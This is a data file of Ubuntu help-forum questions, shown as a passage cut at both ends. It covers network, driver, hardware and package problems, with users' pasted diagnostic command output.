have installed latest oracle jdk
354720	ca n't access ubuntu 12 server ( web ) from client , but can ping	i tried to setup small server using ubuntu 12 . first , i setup internal network and web server and try to access it from my laptops ( windows ) . it works , i can ping the server and open the web page from the web server . along the way , i try to setup the samba , dns and squid ( proxy server ) for my server . it seems like during the second install ( samba , dns , squid ) i messed up the network , now i can only ping the server but could not access the web server . where did i messed up ? im completely clueless . any help i really appreciate . [ edit ] i run this command : telnet 192.168.10.100 http and the result is : unable to connect to remote host : connection refused 192.168.10.100 is server 's ip and try to run netstat : netstat -- numeric-ports -l | grep 80 and the result is : tcp 0 0 0.0.0.0:80 0.0.0.0 : * listen tcp6 0 0 : ::5800 : : : * listen i dont understand with that result , what does it mean ? btw , i can access 192.168.10.100 within server but can not access it from client brower . what could possibly blocking the port 80 for client ?
354725	empathy ask for authorisation each time i try to connect to facebook chat	empathy ca n't connect to facebook chat , it always ask for authorisation at the chat window . i tried a workaround by changing the facebook provider configuration and re-installed empathy/reconnect to facebook , but nothing worked at all ! i am running ubuntu 13.04 x64 and empathy version 3.6.4 .
354726	how to type the indian rupee symbol ?	i want to type the indian rupee symbol . so i went to system settings > > keyboard layout and clicked on the options button . under the adding currency signs to keys sections , i checked the rupee on 4 option . later when i opened the layout chart of the keyboard there was rupee sign in the 4 key but i do not know how to type the symbol . what combination of the keys will type the rupee symbol on the screen ?
354731	13.04 install , network problem no internet access wired or wireless	after having installed ubuntu 13.04 on my desktop i can not connect to the internet wirelessly or wired ? in networks wireless is not displayed wired is but it says cable unplugged . i have tried for two days using every fix on the net without luck can you help . i have tried echo on | sudo tee /sys/class/net/eth0/device/power/control which tells me its on . tried sudo dhclient wlan0 but it says can not find device . sudo iwconfig eth0 no wireless extensions . lo no wireless extensions . sudo iwlist scan eth0 interface does n't support scanning . lo interface does n't support scanning . i believe its a driver problem so i downloaded the following onto another computer transferred via usb and installed . all worked except patch which said a later version was already installed dkms_2.2.0.3-1ubuntu3_all.deb patch_2.6.1-3_i386.deb fakeroot_1.18.2-1_i386.deb bcmwl-kernel-source_5.100.82.38+bdcom-0ubuntu6_i386.deb $ lsmod module size used by nls_iso8859_1 12617 0 rfcomm 37420 0 bnep 17669 2 bluetooth 202069 10 bnep , rfcomm snd_hda_codec_via 45850 1 snd_cmipci 35020 2 snd_hda_intel 38307 3 snd_hda_codec 117580 2 snd_hda_codec_via , snd_hda_intel snd_mpu401_uart 13865 1 snd_cmipci snd_opl3_lib 18651 1 snd_cmipci gameport 15016 1 snd_cmipci snd_usb_audio 114886 1 snd_usbmidi_lib 24210 1 snd_usb_audio snd_hwdep 13272 3 snd_usb_audio , snd_hda_codec , snd_opl3_lib snd_pcm 80890 4 snd_usb_audio , snd_hda_codec , snd_hda_intel , snd_cmipci snd_seq_midi 13132 0 snd_seq_midi_event 14475 1 snd_seq_midi snd_page_alloc 14230 2 snd_pcm , snd_hda_intel pwc 72744 0 videobuf2_vmalloc 12920 1 pwc videobuf2_memops 13042 1 videobuf2_vmalloc videobuf2_core 39161 1 pwc coretemp 13131 0 kvm_intel 126842 0 snd_rawmidi 25114 3 snd_usbmidi_lib , snd_mpu401_uart , snd_seq_midi kvm 376505 1 kvm_intel snd_seq 51280 2 snd_seq_midi_event , snd_seq_midi joydev 17097 0 videodev 95806 2 pwc , videobuf2_core nouveau 834513 3 asus_atk0110 17390 0 ppdev 12817 0 snd_seq_device 14137 4 snd_seq , snd_rawmidi , snd_opl3_lib , snd_seq_midi mxm_wmi 12893 1 nouveau snd_timer 24411 3 snd_pcm , snd_seq , snd_opl3_lib wmi 18590 2 mxm_wmi , nouveau parport_pc 27504 1 video 18894 1 nouveau lpc_ich 16925 0 mac_hid 13037 0 snd 56485 26 snd_usb_audio , snd_hwdep , snd_timer , snd_hda_codec_via , snd_pcm , snd_seq , snd_rawmidi , snd_usbmidi_lib , snd_hda_codec , snd_hda_intel , snd_mpu401_uart , snd_seq_device , snd_cmipci , snd_opl3_lib ttm 71289 1 nouveau drm_kms_helper 47545 1 nouveau drm 228750 5 ttm , drm_kms_helper , nouveau soundcore 12600 1 snd lp 13299 0 parport 40753 3 lp , ppdev , parport_pc i2c_algo_bit 13197 1 nouveau microcode 18286 0 serio_raw 13031 0 hid_logitech 22081 0 ff_memless 12877 1 hid_logitech usbhid 41805 1 hid_logitech hid 82666 2 hid_logitech , usbhid usb_storage 47684 0 atl1e 32206 0 $ sudo lshw -c network *-network description : ethernet interface product : ar8121/ar8113/ar8114 gigabit or fast ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : b0 serial : 48:5b:39 : cb:0e : eb capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1e driverversion=1.0.0.7-napi firmware=l1e latency=0 link=no multicast=yes port=twisted pair resources : irq:17 memory : feac0000-feafffff ioport : dc00 ( size=128 ) $ sudo iwconfig lo no wireless extensions . eth0 no wireless extensions . $ sudo iwlist scan lo interface does n't support scanning . eth0 interface does n't support scanning . $ dmesg | tail -30 [ 47.596313 ] serial8250 : too much work for irq23 [ 47.604471 ] serial8250 : too much work for irq23 [ 47.612583 ] serial8250 : too much work for irq23 [ 47.620656 ] serial8250 : too much work for irq23 [ 237.068281 ] systemd-hostnamed [ 2186 ] : warning : nss-myhostname is not installed . changing the local hostname might make it unresolveable . please install nss-myhostname ! [ 242.948773 ] ext4-fs ( sda1 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 250.194625 ] usb 1-2 : usb disconnect , device number 3 [ 773.840384 ] audit_printk_skb : 36 callbacks suppressed [ 773.840389 ] type=1400 audit ( 1381133727.880:32 ) : apparmor= '' denied '' operation= '' capable '' parent=2317 profile= '' /sbin/dhclient '' pid=2318 comm= '' dhclient '' pid=2318 comm= '' dhclient '' capability=12 capname= '' net_admin '' [ 1443.272020 ] usb 1-2 : new high-speed usb device number 5 using ehci-pci [ 1443.483426 ] usb 1-2 : new usb device found , idvendor=058f , idproduct=6387 [ 1443.483431 ] usb 1-2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 1443.483434 ] usb 1-2 : product : mass storage [ 1443.483438 ] usb 1-2 : manufacturer : generic [ 1443.483441 ] usb 1-2 : serialnumber : 292b04ec [ 1443.483839 ] scsi5 : usb-storage 1-2:1.0 [ 1444.481833 ] scsi 5:0:0:0 : direct-access generic flash disk 8.07 pq : 0 ansi : 2 [ 1444.482621 ] sd 5:0:0:0 : attached scsi generic sg2 type 0 [ 1444.484183 ] sd 5:0:0:0 : [ sdb ] 1014272 512-byte logical blocks : ( 519 mb/495 mib ) [ 1444.487490 ] sd 5:0:0:0 : [ sdb ] write protect is off [ 1444.487496 ] sd 5:0:0:0 : [ sdb ] mode sense : 03 00 00 00 [ 1444.488196 ] sd 5:0:0:0 : [ sdb ] no caching mode page present [ 1444.488200 ] sd 5:0:0:0 : [ sdb ] assuming drive cache : write through [ 1444.491058 ] sd 5:0:0:0 : [ sdb ] no caching mode page present [ 1444.491062 ] sd 5:0:0:0 : [ sdb ] assuming drive cache : write through [ 1444.732526 ] sdb : [ 1444.734934 ] sd 5:0:0:0 : [ sdb ] no caching mode page present [ 1444.734939 ] sd 5:0:0:0 : [ sdb ] assuming drive cache : write through [ 1444.734943 ] sd 5:0:0:0 : [ sdb ] attached scsi removable disk [ 1445.108512 ] systemd-hostnamed [ 2523 ] : warning : nss-myhostname is not installed . changing the local hostname might make it unresolveable . please install nss-myhostname ! $ lspci 00:00.0 host bridge : intel corporation 82g33/g31/p35/p31 express dram controller ( rev 10 ) 00:01.0 pci bridge : intel corporation 82g33/g31/p35/p31 express pci express root port ( rev 10 ) 00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 01 ) 00:1c.0 pci bridge : intel corporation nm10/ich7 family pci express port 1 ( rev 01 ) 00:1c.1 pci bridge : intel corporation nm10/ich7 family pci express port 2 ( rev 01 ) 00:1d.0 usb controller : intel corporation nm10/ich7 family usb uhci controller # 1 ( rev 01 ) 00:1d.1 usb controller : intel corporation nm10/ich7 family usb uhci controller # 2 ( rev 01 ) 00:1d.2 usb controller : intel corporation nm10/ich7 family usb uhci controller # 3 ( rev 01 ) 00:1d.3 usb controller : intel corporation nm10/ich7 family usb uhci controller # 4 ( rev 01 ) 00:1d.7 usb controller : intel corporation nm10/ich7 family usb2 ehci controller ( rev 01 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev e1 ) 00:1f.0 isa bridge : intel corporation 82801gb/gr ( ich7 family ) lpc interface bridge ( rev 01 ) 00:1f.1 ide interface : intel corporation 82801g ( ich7 family ) ide controller ( rev 01 ) 00:1f.2 ide interface : intel corporation nm10/ich7 family sata controller [ ide mode ] ( rev 01 ) 00:1f.3 smbus : intel corporation nm10/ich7 family smbus controller ( rev 01 ) 01:00.0 vga compatible controller : nvidia corporation g98 [ geforce 8400 gs rev . 2 ] ( rev a1 ) 02:00.0 ethernet controller : qualcomm atheros ar8121/ar8113/ar8114 gigabit or fast ethernet ( rev b0 ) 04:00.0 modem : intel corporation fa82537ep 56k v.92 data/fax modem pci ( rev 03 ) 04:01.0 multimedia audio controller : c-media electronics inc cmi8738/cmi8768 pci audio ( rev 10 )
354736	how to access ubuntu partition from windows using virtualbox	i have found links describing to do the exact opposite : accessing windows through virtualbox in ubuntu . i do n't want to reboot the system everytime i want to check something small in ubuntu . i have ubuntu 12.04 and windows 8 ( dual boot ) . how can i set up virtualbox ( or any other free virtualization software ) so that i can access ubuntu from windows ?
354741	how to parse a hindi language pdf file in hadoop running on ubuntu 13.04	i 've installed hadoop on ubuntu 13.04 . now i need to run map-reduce jobs on pdf files that are in hindi language ( no english language content ) . please guide me on how to proceed ?
354743	laptop heating issue in ubuntu 12.10 !	i am using ubuntu 12.10 currently . i have an ati mobility radeon graphic card in my laptop . my laptop has heating problem . laptop fan is always on . when i searched on the internet , i found that this could be because of my graphic card driver . on further searching , i found out about proprietary and open source drivers . could someone tell me the pros and cons of both type of drivers ? i want to know which driver i should install . output of lspci -nn | grep vga is 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati rv710 [ mobility radeon hd 4500/5100 series ] [ 1002:9553 ]
354747	how do i find the credentials for postgresql deployed via a charm ?	i have deployed the postgresql charm ( the recommended one ) and tweaked its configuration but now i would like to know the parameters to connect to it like username , password ... in the readme there is a part that says : 'the postgresql service provides ' and then a list with 'host ' 'database ' 'user ' 'password ' ... how can i access this so i can configure another service to connect to it manually ? i have deployed the python-django charm and created a relationship with postgres thinking it would autoconfigure the django settings file to connect to postgres and i could inspect it to see the parameters . but then when i ssh into the machine where python-django runs and i do find / -name 'settings.py ' it returns only some template settings files with an empty db config
354748	how to delete the licence key in order to add new one with a new format	i have 3 applicatons in the store . however , my license key number format has been changed and i would like to delete all the unused keys in order to replace them ... how can i manage this replacement ? thank you for your support guilhem
354750	nfs/cifs on ubuntu	network file server running on ubuntu 13.04 : how to make ubuntu 13.04 desktop my file server ( nfs/cifs shares ) for linux/windiws clients using ipv4 ?
354752	deactivate defect laptop keyboard ubuntu 12.04	my notebook keyboard ( t430 ) is defect and spawns more or less random keypress events . so i 'm searching for a way , that linux ignore all input that comes from this device . my guess is that i have todo some udev magic , but thats just a guess and i 'm not realy know where to start . laptop : thinkpad t430 os : ubuntu 12.04
354753	can not use vodafone connect pen k3806-z ( 12.04 )	i have a vodafone connect pen k3806-z and i 'm trying to use with ubuntu 12.04 . i already google about this and try many solution but without success . when i connect the usb pen , the device is recognize : usb-devices -- -- -- -- -- - ... t : bus=03 lev=01 prnt=01 port=01 cnt=01 dev # = 5 spd=480 mxch= 0 d : ver= 2.00 cls=00 ( > ifc ) sub=00 prot=00 mxps=64 # cfgs= 1 p : vendor=19d2 prodid=1013 rev=00.01 s : manufacturer=vodafone ( zte ) s : product=k3806-z s : serialnumber=acc81d40e48ea6ea72d3c0e77795a0e18981ce10 c : # ifs= 1 cfg # = 1 atr=a0 mxpwr=500ma i : if # = 0 alt= 0 # eps= 2 cls=08 ( stor . ) sub=06 prot=50 driver= ( none ) ... but no usb drive is mounted . when i look into dmesg , i get this : [ 2707.722378 ] usb 3-1 : usb disconnect , device number 4 [ 2716.870415 ] usb 3-2 : new high-speed usb device number 5 using xhci_hcd [ 2716.887337 ] usb 3-2 : new usb device found , idvendor=19d2 , idproduct=1013 [ 2716.887344 ] usb 3-2 : new usb device strings : mfr=2 , product=1 , serialnumber=3 [ 2716.887348 ] usb 3-2 : product : k3806-z [ 2716.887351 ] usb 3-2 : manufacturer : vodafone ( zte ) [ 2716.887354 ] usb 3-2 : serialnumber : acc81d40e48ea6ea72d3c0e77795a0e18981ce10 [ 2716.888078 ] scsi8 : usb-storage 3-2:1.0 [ 2717.885505 ] scsi 8:0:0:0 : cd-rom vodafone usb scsi cd-rom 0001 pq : 0 ansi : 0 [ 2717.885884 ] scsi 8:0:0:1 : direct-access vodafone storage 0001 pq : 0 ansi : 0 [ 2717.887579 ] sr1 : scsi3-mmc drive : 0x/0x caddy [ 2717.887831 ] sr 8:0:0:0 : attached scsi cd-rom sr1 [ 2717.888021 ] sr 8:0:0:0 : attached scsi generic sg3 type 5 [ 2717.888399 ] sd 8:0:0:1 : attached scsi generic sg4 type 0 [ 2717.889194 ] sd 8:0:0:1 : [ sdc ] attached scsi removable disk [ 2717.949242 ] sr1 : cdrom ( ioctl ) error , command : xpwrite , read disk info 51 00 00 00 00 00 00 00 02 00 [ 2717.949258 ] sr : sense key : hardware error [ current ] [ 2717.949263 ] sr : add . sense : no additional sense information [ 2718.026150 ] xhci_hcd 0000:00:14.0 : warn event trb for slot 4 ep 2 with no tds queued ? [ 2718.220919 ] sr1 : cdrom ( ioctl ) error , command : xpwrite , read disk info 51 00 00 00 00 00 00 00 02 00 [ 2718.220936 ] sr : sense key : hardware error [ current ] [ 2718.220941 ] sr : add . sense : no additional sense information can anyone help me with this ?
354754	awn - how can move configuration files	i 'd like copy awn configuration files from a laptop to another one . i try copy .config .gconf/apps/awn* .gconf/apps/avant* , but as result , into new laptop the awn dock contains only the initial applet . thanks
354755	ubuntu networking - dns/dhcp	how to configure ubuntu 13.04 as my dns ( domain name server ) and dhcp server for other linux client machines ? master server ip configuration- ip address : 192.168.200.100 gateway : 192.168.200.1 name : ubuntu-1 ( for instance )
354756	laptop locks screen instead of hibernates when rebooted	i have done the above with question `` asked jun 7 '12 at 17:26 elshaer 307 '' with my toshiba laptop 1gb ram and running at 2.2mhz and k12.04lts but when i reboot after using kdesudo pm-hibernate it hangs and freezes from the splash screen when resuming from /dev/disk/by-uuid/f499c2d1-1f91-4192-ab3e-c854464ac905 ? how do i fix the hiberante ? ray
354757	name of the lubuntu screen brightness programme	i have lubuntu 13.04 on a couple of year old imac and using the screen brightness keyboard buttons works great out of the box . however , i tend to use i3wm as my primary windows manager and the buttons do n't work there . i can use a workaround using xrandr to adjust the gamma ( rather than actual brightness ) , but it would seem easier to just call whatever programme lxde uses within i3wm . does anyone know the name of the programme and/or how to find such a thing out ?
354758	reducing ubuntu screen dpi	first of i apologize if this is a duplicate thread , i tried searching to no avail . i 'm currently looking to reduce the entire system dpi in ubuntu 13.04 i work better with multiple windows and the default dpi for my laptop is a little to big .
354760	what applications are available for reading python documentation offline ?	i 'm interested in reading python documentation when i 'm traveling . right now , i 'm doing that by entering the command : $ pydoc2.7 pyqt4.qtgui.qpushbutton help on class qpushbutton in pyqt4.qtgui : pyqt4.qtgui.qpushbutton = class qpushbutton ( qabstractbutton ) | qpushbutton ( qwidget parent=none ) | qpushbutton ( qstring , qwidget parent=none ) | qpushbutton ( qicon , qstring , qwidget parent=none ) | | method resolution order : | qpushbutton | ... | ... | ... i do n't really like this way of reading the documentation . i 'm interested if there are other applications which let me read python documentation offline .
354764	virtualbox guest extensions with kernel 3.8.0-31 do n't work	my ubuntu 12.04 lts ( running in a virtualbox on an windows 7 pc ) just updated to kernel 3.8.0-31 . after that i tried to install the vitualbox-guest-additions , but this failed with an error , that no suitable module for the running kernel was found . the make.log said something like : cc [ m ] /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/r0drv/linux/initterm-r0drv-linux.o cc [ m ] /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/r0drv/linux/memobj-r0drv-linux.o /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/r0drv/linux/memobj-r0drv-linux.c : in function ‘rtr0memobjnativemapuser’ : /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/r0drv/linux/memobj-r0drv-linux.c:1451:38 : error : ‘vm_reserved’ undeclared ( first use in this function ) /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/r0drv/linux/memobj-r0drv-linux.c:1451:38 : note : each undeclared identifier is reported only once for each function it appears in make [ 2 ] : *** [ /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/r0drv/linux/memobj-r0drv-linux.o ] error 1 make [ 1 ] : *** [ /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv ] error 2 make : *** [ _module_/var/lib/dkms/virtualbox/4.1.12/build ] error 2 make : leaving directory `/usr/src/linux-headers-3.8.0-31-generic' what can i do ?
354765	how can i rewrite url to a specific ip or another domain in dnsmasq ?	i added two lines : address=/dev/127.0.0.1 address=/g.cn/127.0.0.1 to /etc/dnsmasq.conf file , and i have nginx listened 80 port . open urls like http : //xxx.dev/ , i can see nginx 's default site . but when i open http : //g.cn/ , there is no nginx default site . why ? in short , what i want is when i open g.com in browser , i want the url redirect to google.com is that possible on my local ? thanks !
354766	nitrogen [ apply ] seems to be sent to background . dual monitors , two wallpapers .	i 'm trying to get two separate wallpapers for my two monitor set up . i 've installed nitrogen which i heard is able to do this . however when i press apply in the nitrogen gui nothing happens on my screens and the old wallpaper is left up . when i log out i can briefly see the wallpaper set up i designed with nitrogen but then it goes back to the old wallpaper . i feel like something is overriding the nitrogen settings . any help with how to change this will be greatly appreciated . thank you .
354768	ubuntu 12.04 usb stick instalation problem . help !	i recently decided to change from using windows xp on my dell dimension 1100 to ubuntu 12.04 . i followed the instructions for making a bootable usb stick and even managed to run abuntu from the usb to see what it was like before deciding whether or not to install it fully . my problems started when i tried to install ubuntu . i went through all the screens choosing language , location etc . but when it came to the screen with the ubuntu logo and the 5 dots turning red to white nothing else seemed to happen . the light was still glowing in the usb stick but there seemed to be no hard drive activity . i left it overnight ( 7hrs ) but it still had not progressed come the morning . i pressed the escape key and was presented with a black screen with lots of white writing on it . the last line says `` begin : configuring screensaver ... ... done . '' i left it again until i had returned home from work but the same problem remained . i switched off my computer , restarted it , then tried the install from usb option in the boot menu . this time i did not get the pages telling you about all the features of ubuntu but it stopped again at the same place as before . what have i done ? probably something obvious to someone with any type of computer knowledge could help with , but for now i am stuck with a pc with no operating system . help me please .
354769	about hardware support for ubuntu 13.04	i have a question . can i run ubuntu 13.04 in my pc . here my pc spec : -amd phenom ii x4 955 -gigabyte 970a-ds3 -16 gb ddr3 ram -msi nvidia gtx 650 2gb ddr5 before this i got issue with ubuntu 12.04. i got this message `` starting load fallback graphics devices [ fail ] '' and cant login to ubuntu anymore . sry for my bad english and thanks for help .
354770	adding softhyphens to html from command line	i am looking for a way to automatically insert soft hyphens ( & shy ; or unicode character ) to hyphenate words into html document from command line . 1 ) what is best way to do so from command line ? 2 ) what are options where it comes to using different dictionaries/rules to word hyphenation ? are there rules for languages other than english ? i am aware that some software , including libreoffice like decribed in automatic hyphenation software , have option to apply hyphenation to document , but i am looking for way to do so in already existing html document without using word processing software .
354771	gpg error while trying to install tor from external repository	hello all i am having a problem in installing tor in ubuntu ... .when i start adding tor repository to my system and write the command gpg -- keyserver keys.gnupg.net -- recv 886ddd89 then a error comes which is gpg : invalid option `` -- keyserver.ubuntu.com '' hailendra @ hailendra-ideapad-z570 : ~ $ gpg -- keyserver keys.ubuntu.com -- recv 886ddd89 gpg : requesting key 886ddd89 from hkp server keys.ubuntu.com gpgkeys : key 886ddd89 not found on keyserver gpg : no valid openpgp data found . gpg : total number processed : 0 can any one help me what to do ?
354774	libreoffice impress & mate 's toolbar	since the last update of libreoffice , when i work with impress , the toolbars of mate disappear without any reason . the only way to have them back is to reboot the computer . it happens randomelly and it seems there are n't relation with a specific options of impress . it just happens . someone else that has the same problem ? is this a bug of the last version of libreoffice ?
354775	ubuntu on new sony vaio laptop svf142c29m	i have installed on my son 's new laptop sony vaio laptop svf142c29m ( instead of windows 8 ) and we are very pleased . congratulations to all who develop this excellent os.my son loves it ! however , there is a problem with audio support on this machine . playback works via the headphone socket , but not via the internal speakers . it 's easy to work around this . but the microphone is not supported and this represents a serious drawback . i am a linux neophyte . i have been as sophisticated as trying `` sudo also force-reload '' in the terminal . but that 's about as sophisticated as i can get ! any help would be appreciated or advice on whether i should log this as a bug and wait for a later release to resolve this . best wishes , richard
354776	how to install intel d845gvsr motherboard drivers ? ? igp graphics driver needed for lubuntu !	i installed lubuntu 13.04 on my old p4 2.4ghz 1gb ram , intel d845gvsr motherboard . i could n't find its graphics driver ( igp , no card ) , intel website has drivers but those are .rpm based i could not find .deb package . i tried intel-linux-driver-installer but after using it my desktop went black . i.e when i start pc it shows black screen after lubuntu starts . i want to play games on it specially counter strike 1.6 online . as win xp use atleast 250mb ram , i thought installing lubuntu will help me improve performance while playing online . i have tried cs 1.6 using wine but game could not detect opengl or direct3d . graphics were jerky bad there was no sound ... when i open any website in chromium any flash content like video , adds , posters looks bad , weird . i tried lubuntu-restricted extraa . it doesnt work with anything except youtube videos.. please help me..
354777	problem installing software for ubuntu 13.04	i installed and updated ubuntu but i cant seem to install software . i tried the terminal and it says : ugwyn @ ugwyn-vgn-tx57gn-b : ~ $ sudo apt-get install flashplugin-installer [ sudo ] password for ugwyn : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? ugwyn @ ugwyn-vgn-tx57gn-b : ~ $ am i doing something wrong ?
354778	keyboard layout indicator just disappeared today !	last night everything worked fine but today when i turned on my system i saw that keyboard layout indicator at the top of screen is disappeared ! ! ! even i can not change it by alt+shift like before ! ! ! in login screen it is there but when i login to my user it just gone ! ! ! i added my keyboard layout again but nothing changed ! ! 1 help please
354779	make a window shortcut permanent	i want to be able to always make the terminal window pop-up with focus with the same keyboard shortcut . i 've found so far that if i right-click the window and go to more actions > window shortcuts , it does exactly what i want . the problem is , the shortcut does n't survive the window close . i would like to find a way to make this permanent , even after reboot . please note that i 'm not asking for a global keyboard shortcut to open the window , that is already correctly configured , i only want to give the focus to the window as the window shortcut does .
354783	why is network interface loaded as `` rename3 '' ?	my ubuntu 13.04 machine ( asus m2n32sli deluxe mobo ) is loading one of two interfaces on the motherboard as `` rename3 '' . the other interface is eth0 . no cable connected on eth0 . why is this so ? how do i fix this ? i want to retain dynamic dns .
354786	prevent focus window on external dispaly when changing workspaces in gnome-shell	i have an external display plugged into the laptop and use it as additonal ( fixed , by default ) workspace . when i work on the laptop 's screen and want to change to an app that is on another workspace ( same display ) i use ctrl+alt+arrow . however when i do that the application that is running on the external ( fixed ) workspace is always focused on every workspace change . is there any solution to prevent the external workspace from auto-focusing ?
354788	do i need a graphics card driver for linux ?	i am using linux with a kde desktop environment and the following hardware configuration : • intel core i7 3.4ghhz 4770k • msi z87 mpower motherboard • msi geforce gtx760 2gb ddr5 graphics card • 1tb hard drive • 16gb ram do i need to install a graphics card driver ?
354789	wakeonlan does not work , trying to troubleshoot	i have an asus m2n32sli-deluxe motherboard on the machine on which i am running ubuntu . i checked my ethtool ouptut and found that my machine will boot on lan : rudy @ jariwala-home : ~ $ sudo ethtool rename3 [ sudo ] password for rudy : settings for rename3 : supported ports : [ mii ] supported link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/full supported pause frame use : no supports auto-negotiation : yes advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/full advertised pause frame use : no advertised auto-negotiation : yes speed : 100mb/s duplex : full port : mii phyad : 1 transceiver : external auto-negotiation : on supports wake-on : g wake-on : g link detected : yes not sure why my interface installed as `` rename3 '' but i have posted that as another question ifconfig : rudy @ jariwala-home : ~ $ ifconfig eth0 link encap : ethernet hwaddr 04:4b:80:80:80:03 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:363 errors:0 dropped:0 overruns:0 frame:0 tx packets:363 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:35354 ( 35.3 kb ) tx bytes:35354 ( 35.3 kb ) rename3 link encap : ethernet hwaddr 04:4b:80:80:80:03 inet addr:192.168.0.113 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fdac:43ed : a7e2:0:64b:80ff : fe80:8003/64 scope : global inet6 addr : fe80 : :64b:80ff : fe80:8003/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:6969 errors:0 dropped:0 overruns:0 frame:0 tx packets:5225 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:7793783 ( 7.7 mb ) tx bytes:579672 ( 579.6 kb ) wlan0 link encap : ethernet hwaddr 00:15 : af:01:0d : a0 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) i tried running the commands sudo wakeonlan 04:4b:80:80:80:03 and sudo etherwake 04:4b:80:80:80:03 from my ubuntu laptop ( on wifi ) but it does not seem to boot my desktop . i even tried plugging the laptop into the router and run the same commands but no joy . id like to start using it as a file server so would appreciate any help to get my wol going . my bios is : phoenix awardbios ( not sure where to check version )
354790	mobile broadband issues after update	i have recently switched from windows to lubuntu 13.04 . my laptop is dell d620 and i use a huawei evdo mobile broadband device to connect to internet . now after a fresh install of lubuntu 13.04 , my connection of mobile broadband connected within seconds . but then i used 'sudo apt-get update ' and updated the software . after the update , everything is working great except broadband connection . it simpley does not connect to internet . some times it does connect after several minutes and multiple tries and that when i plug evdo device into a different usb port . also please note that in terminal 'vnstat ' shows 'ppp0 disabled ' . i have deleted and re-created the mobile broadband connection several times and out of desperation did clean install of lubuntu 13.04 a couple of times too , but the problem persists ; the mobile broadband simply wo n't connect to internet . also , everytime i click on the broadband connection to connect , it 's name changes automatically . sometimes it 's just evdo , some times it 's 'label ' etc . i have searched on the internet to find that some other users are facing same problem but without any solution in sight . please help . right now i am posting this message from the same broadband connection which connected after retries which spanned 20 minutes . please help .
354793	how to change font from tamil ?	the default language used in the laptop is tamil . we do n't know how to switch back to english . if we type something we are getting something . we do n't know what is the font name and version too . even the menu bar and task bar contents are in tamil .
354794	using alt codes in skype ?	in skype 4.2.0.11 i ca n't seem to enter alt codes with my setup compose key that i enabled under keyboard layout , my compose key is setup to use left win key , but when i try to use it in skype to type accented characters such as áéíóú i ca n't do it because skype is ignoring the key input and instead typing regular characters . for every other application i can enter alt codes with the compose key as normal with no problems such as text editors and web browsers . all except skype which ignores it completely , so the question is ... how can i force skype to recognise alt codes entered with the compose key ? is there a gtk keyboard modifier script i can put into my .bashrc file so it captures the compose key input for skype ? when i do n't have the compose key for left win turned on and just have the default ctrl + < alt > keys for inputting alt codes it works fine in skype , but i find it a bit impractical and tedious to type them the long way by knowing their unicode hex codes when i could just easily type them quicker with the compose key . using ubuntu raring 13.04 ~
354798	how to fix broken dependencies after removing gnome 3 ?	i know the variants of this question has been asked in askubuntu and elsewhere on the internet , but the solutions proposed did n't work for me . this is what i get from dpkg -- configure -a : dpkg : dependency problems prevent configuration of libwebkitgtk-1.0-0 : libwebkitgtk-1.0-0 depends on libjavascriptcoregtk-1.0-0 ( = 1.10.2-0ubuntu1 ) ; however : version of libjavascriptcoregtk-1.0-0 on system is 2.0.4-2~ubuntu13.04.1 . dpkg : error processing libwebkitgtk-1.0-0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libwebkitgtk-3.0-0 : libwebkitgtk-3.0-0 depends on libjavascriptcoregtk-3.0-0 ( = 1.10.2-0ubuntu1 ) ; however : version of libjavascriptcoregtk-3.0-0 on system is 2.0.4-2~ubuntu13.04.1 . dpkg : error processing libwebkitgtk-3.0-0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of rhythmbox-plugins : rhythmbox-plugins depends on gir1.2-rb-3.0 ( = 2.98-0ubuntu5 ) ; however : version of gir1.2-rb-3.0 on system is 2.99.1-0ubuntu1~raring1 . dpkg : error processing rhythmbox-plugins ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of rhythmbox : rhythmbox depends on gir1.2-rb-3.0 ( = 2.98-0ubuntu5 ) ; however : version of gir1.2-rb-3.0 on system is 2.99.1-0ubuntu1~raring1 . dpkg : error processing rhythmbox ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of totem : totem depends on libtotem0 ( < < 3.7 ) ; however : version of libtotem0 on system is 3.8.2-0ubuntu2~raring1 . totem depends on totem-common ( = 3.6.3-0ubuntu6 ) ; however : version of totem-common on system is 3.8.2-0ubuntu2~raring1 . dpkg : error processing totem ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of 